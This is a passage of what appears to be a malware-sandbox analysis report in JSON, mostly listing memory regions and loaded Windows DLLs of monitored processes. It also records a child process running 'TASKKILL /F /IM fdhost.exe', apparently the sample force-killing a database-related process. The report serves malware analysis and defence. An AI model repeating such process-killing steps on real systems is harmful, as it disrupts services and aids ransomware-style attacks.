"c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:01:22.070", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1993539584, "type": "region", "version": 1 }, "end_va": 1994964991, "entry_point": 1993849405, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_2425", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1993539584, "timestamp": "00:01:22.071", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_2426", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:01:22.071", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997733888, "type": "region", "version": 1 }, "end_va": 1997950975, "entry_point": 1997739101, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_2427", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997733888, "timestamp": "00:01:22.072", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_2428", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:01:22.072", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_2429", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:01:22.073", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_2430", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:01:22.073", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_2431", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:22.073", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_2432", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:22.074", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 5799935, "entry_point": 0, "filename": null, "id": "region_2433", "name": "pagefile_0x0000000000400000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4194304, "timestamp": "00:01:22.081", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_2434", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:01:22.081", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_2435", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:01:22.082", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_2436", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:22.179", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 466943, "entry_point": 0, "filename": null, "id": "region_2437", "name": "pagefile_0x0000000000070000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 458752, "timestamp": "00:01:22.179", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 524288, "type": "region", "version": 1 }, "end_va": 540671, "entry_point": 524288, "filename": "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui", "id": "region_2438", "name": "taskkill.exe.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui", "region_type": "memory_mapped_file", "start_va": 524288, "timestamp": "00:01:22.179", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 856063, "entry_point": 0, "filename": null, "id": "region_2439", "name": "private_0x00000000000d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 851968, "timestamp": "00:01:22.180", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1445887, "entry_point": 0, "filename": null, "id": "region_2440", "name": "private_0x0000000000160000", "norm_filename": null, "region_type": "private_memory", "start_va": 1441792, "timestamp": "00:01:22.180", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 1773567, "entry_point": 0, "filename": null, "id": "region_2441", "name": "pagefile_0x00000000001b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1769472, "timestamp": "00:01:22.180", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 3342336, "type": "region", "version": 1 }, "end_va": 3604479, "entry_point": 0, "filename": null, "id": "region_2442", "name": "private_0x0000000000330000", "norm_filename": null, "region_type": "private_memory", "start_va": 3342336, "timestamp": "00:01:22.180", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 3604480, "type": "region", "version": 1 }, "end_va": 3866623, "entry_point": 0, "filename": null, "id": "region_2443", "name": "private_0x0000000000370000", "norm_filename": null, "region_type": "private_memory", "start_va": 3604480, "timestamp": "00:01:22.180", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 5832704, "type": "region", "version": 1 }, "end_va": 7409663, "entry_point": 0, "filename": null, "id": "region_2444", "name": "pagefile_0x0000000000590000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5832704, "timestamp": "00:01:22.180", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 7864320, "type": "region", "version": 1 }, "end_va": 28835839, "entry_point": 0, "filename": null, "id": "region_2445", "name": "pagefile_0x0000000000780000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7864320, "timestamp": "00:01:22.181", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 28835840, "type": "region", "version": 1 }, "end_va": 29622271, "entry_point": 28835840, "filename": "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui", "id": "region_2446", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 28835840, "timestamp": "00:01:22.181", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 29884416, "type": "region", "version": 1 }, "end_va": 30146559, "entry_point": 0, "filename": null, "id": "region_2447", "name": "private_0x0000000001c80000", "norm_filename": null, "region_type": "private_memory", "start_va": 29884416, "timestamp": "00:01:22.181", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985032191, "entry_point": 1984504786, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_2448", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:01:22.181", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_2449", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:22.182", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 3866624, "type": "region", "version": 1 }, "end_va": 3870719, "entry_point": 0, "filename": null, "id": "region_2450", "name": "pagefile_0x00000000003b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3866624, "timestamp": "00:01:22.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1786970112, "type": "region", "version": 1 }, "end_va": 1787346943, "entry_point": 1787112264, "filename": "\\Windows\\SysWOW64\\wbemcomn.dll", "id": "region_2451", "name": "wbemcomn.dll", "norm_filename": "c:\\windows\\syswow64\\wbemcomn.dll", "region_type": "memory_mapped_file", "start_va": 1786970112, "timestamp": "00:01:22.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1787363328, "type": "region", "version": 1 }, "end_va": 1787404287, "entry_point": 1787368602, "filename": "\\Windows\\SysWOW64\\wbem\\wbemprox.dll", "id": "region_2452", "name": "wbemprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemprox.dll", "region_type": "memory_mapped_file", "start_va": 1787363328, "timestamp": "00:01:22.187", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 31129600, "type": "region", "version": 1 }, "end_va": 31391743, "entry_point": 0, "filename": null, "id": "region_2453", "name": "private_0x0000000001db0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31129600, "timestamp": "00:01:22.190", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 31391744, "type": "region", "version": 1 }, "end_va": 32440319, "entry_point": 0, "filename": null, "id": "region_2454", "name": "private_0x0000000001df0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31391744, "timestamp": "00:01:22.190", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 167936, "start_va": 1786773504, "type": "region", "version": 1 }, "end_va": 1786941439, "entry_point": 1786800921, "filename": "\\Windows\\SysWOW64\\winsta.dll", "id": "region_2455", "name": "winsta.dll", "norm_filename": "c:\\windows\\syswow64\\winsta.dll", "region_type": "memory_mapped_file", "start_va": 1786773504, "timestamp": "00:01:22.190", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 32440320, "type": "region", "version": 1 }, "end_va": 35385343, "entry_point": 32440320, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_2456", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 32440320, "timestamp": "00:01:22.202", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 35389440, "type": "region", "version": 1 }, "end_va": 35651583, "entry_point": 0, "filename": null, "id": "region_2457", "name": "private_0x00000000021c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35389440, "timestamp": "00:01:22.202", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 36569088, "type": "region", "version": 1 }, "end_va": 36831231, "entry_point": 0, "filename": null, "id": "region_2458", "name": "private_0x00000000022e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 36569088, "timestamp": "00:01:22.202", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1950744576, "type": "region", "version": 1 }, "end_va": 1950986239, "entry_point": 1950749325, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_2459", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1950744576, "timestamp": "00:01:22.202", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1956511744, "type": "region", "version": 1 }, "end_va": 1956601855, "entry_point": 1956523459, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_2460", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1956511744, "timestamp": "00:01:22.203", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_2461", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:01:22.203", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1956446208, "type": "region", "version": 1 }, "end_va": 1956503551, "entry_point": 1956450869, "filename": "\\Windows\\SysWOW64\\RpcRtRemote.dll", "id": "region_2462", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1956446208, "timestamp": "00:01:22.205", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 7471104, "type": "region", "version": 1 }, "end_va": 7733247, "entry_point": 0, "filename": null, "id": "region_2463", "name": "private_0x0000000000720000", "norm_filename": null, "region_type": "private_memory", "start_va": 7471104, "timestamp": "00:01:22.275", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 30670848, "type": "region", "version": 1 }, "end_va": 30932991, "entry_point": 0, "filename": null, "id": "region_2464", "name": "private_0x0000000001d40000", "norm_filename": null, "region_type": "private_memory", "start_va": 30670848, "timestamp": "00:01:22.275", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 36306944, "type": "region", "version": 1 }, "end_va": 36569087, "entry_point": 0, "filename": null, "id": "region_2465", "name": "private_0x00000000022a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 36306944, "timestamp": "00:01:22.275", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 36962304, "type": "region", "version": 1 }, "end_va": 37224447, "entry_point": 0, "filename": null, "id": "region_2466", "name": "private_0x0000000002340000", "norm_filename": null, "region_type": "private_memory", "start_va": 36962304, "timestamp": "00:01:22.275", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1786707968, "type": "region", "version": 1 }, "end_va": 1786769407, "entry_point": 1786716576, "filename": "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll", "id": "region_2467", "name": "wbemsvc.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemsvc.dll", "region_type": "memory_mapped_file", "start_va": 1786707968, "timestamp": "00:01:22.275", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_2468", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:01:22.276", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_2469", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:01:22.276", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 1785921536, "type": "region", "version": 1 }, "end_va": 1786019839, "entry_point": 1785926453, "filename": "\\Windows\\SysWOW64\\ntdsapi.dll", "id": "region_2470", "name": "ntdsapi.dll", "norm_filename": "c:\\windows\\syswow64\\ntdsapi.dll", "region_type": "memory_mapped_file", "start_va": 1785921536, "timestamp": "00:01:22.283", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 614400, "start_va": 1786052608, "type": "region", "version": 1 }, "end_va": 1786667007, "entry_point": 1786181817, "filename": "\\Windows\\SysWOW64\\wbem\\fastprox.dll", "id": "region_2471", "name": "fastprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\fastprox.dll", "region_type": "memory_mapped_file", "start_va": 1786052608, "timestamp": "00:01:22.283", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "TASKKILL /F /IM fdhost.exe /IM fdhost.exe ", "filename": "c:\\windows\\syswow64\\taskkill.exe", "id": "proc_17", "image_name": "taskkill.exe", "monitor_reason": "child_process", "monitored_id": 17, "origin_monitor_id": 10, "ref_parent_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_2472", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:22.560", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_2473", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:22.560", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_2474", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:22.560", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_2475", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:22.562", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_2476", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:22.562", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 2555903, "entry_point": 0, "filename": null, "id": "region_2477", "name": "private_0x0000000000230000", "norm_filename": null, "region_type": "private_memory", "start_va": 2293760, "timestamp": "00:01:22.562", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2752512, "type": "region", "version": 1 }, "end_va": 3014655, "entry_point": 0, "filename": null, "id": "region_2478", "name": "private_0x00000000002a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2752512, "timestamp": "00:01:22.562", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 9175040, "type": "region", "version": 1 }, "end_va": 9265151, "entry_point": 9198729, "filename": "\\Windows\\SysWOW64\\taskkill.exe", "id": "region_2479", "name": "taskkill.exe", "norm_filename": "c:\\windows\\syswow64\\taskkill.exe", "region_type": "memory_mapped_file", "start_va": 9175040, "timestamp": "00:01:22.562", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_2480", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:01:22.562", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_2481", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:01:22.563", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_2482", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:22.563", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_2483", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:22.563", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_2484", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:22.563", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", 